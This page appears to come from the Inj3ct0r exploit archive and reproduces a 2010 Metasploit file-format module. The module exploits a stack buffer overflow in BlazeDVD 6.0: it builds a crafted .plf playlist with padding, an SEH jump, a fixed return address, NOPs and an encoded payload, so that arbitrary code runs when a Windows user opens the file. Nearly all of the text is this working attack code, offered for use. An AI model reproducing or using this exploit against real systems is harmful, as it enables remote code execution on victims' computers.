BlazeDVD v6.0 Buffer Overflow Exploit (Meta)

Posted on 27 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>BlazeDVD v6.0 Buffer Overflow Exploit (Meta)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================
BlazeDVD v6.0 Buffer Overflow Exploit (Meta)
============================================


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
 
include Msf::Exploit::FILEFORMAT
 
def initialize(info = {})
super(update_info(info,
'Name' =&gt; 'BlazeDVD 6.0 PLF Buffer Overflow',
'Description' =&gt; %q{
This module exploits a stack over flow in BlazeDVD 6.0.
When
the application is used to open a specially crafted plf
file,
a buffer is overwritten allowing for the execution of
arbitrary code.
Set the EXITFUNC to seh or thread for best results.
},
'License' =&gt; MSF_LICENSE,
'Author' =&gt; [ 'Blake' ],
'Version' =&gt; '$Revision 1$',
'References' =&gt;
[
[ 'EDB-ID' , '13998' ],
[ 'BID', '35918' ],
],
'DefaultOptions' =&gt;
{
'EXITFUNC' =&gt; 'process',
},
'Payload' =&gt;
{
'Space' =&gt; 1363,
'BadChars' =&gt; &quot;x00x0ax0d&quot;,
'DisableNops' =&gt; 'True',
},
'Platform' =&gt; 'win',
'Targets' =&gt;
[
[ 'BlazeDVD 6.0 Universal', { 'Ret' =&gt; 0x6033077D } ],
],
'Privileged' =&gt; false,
'DisclosureDate' =&gt; 'June 23, 2010',
'DefaultTarget' =&gt; 0))
 
register_options(
[
OptString.new('FILENAME', [ false,
'The file name.', 'msf.plf']),
], self.class)
 
end
 
def exploit
 
plf = rand_text_alphanumeric(608)
plf &lt;&lt; &quot;xebx06x90x90&quot;
plf &lt;&lt; [target.ret].pack('V')
plf &lt;&lt; make_nops(20)
plf &lt;&lt; payload.encoded
plf &lt;&lt; rand_text_alphanumeric(1364 - payload.encoded.length)
 
print_status(&quot;Creating '#{datastore['FILENAME']}' file ...&quot;)
 
file_create(plf)
 
end
 
end


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20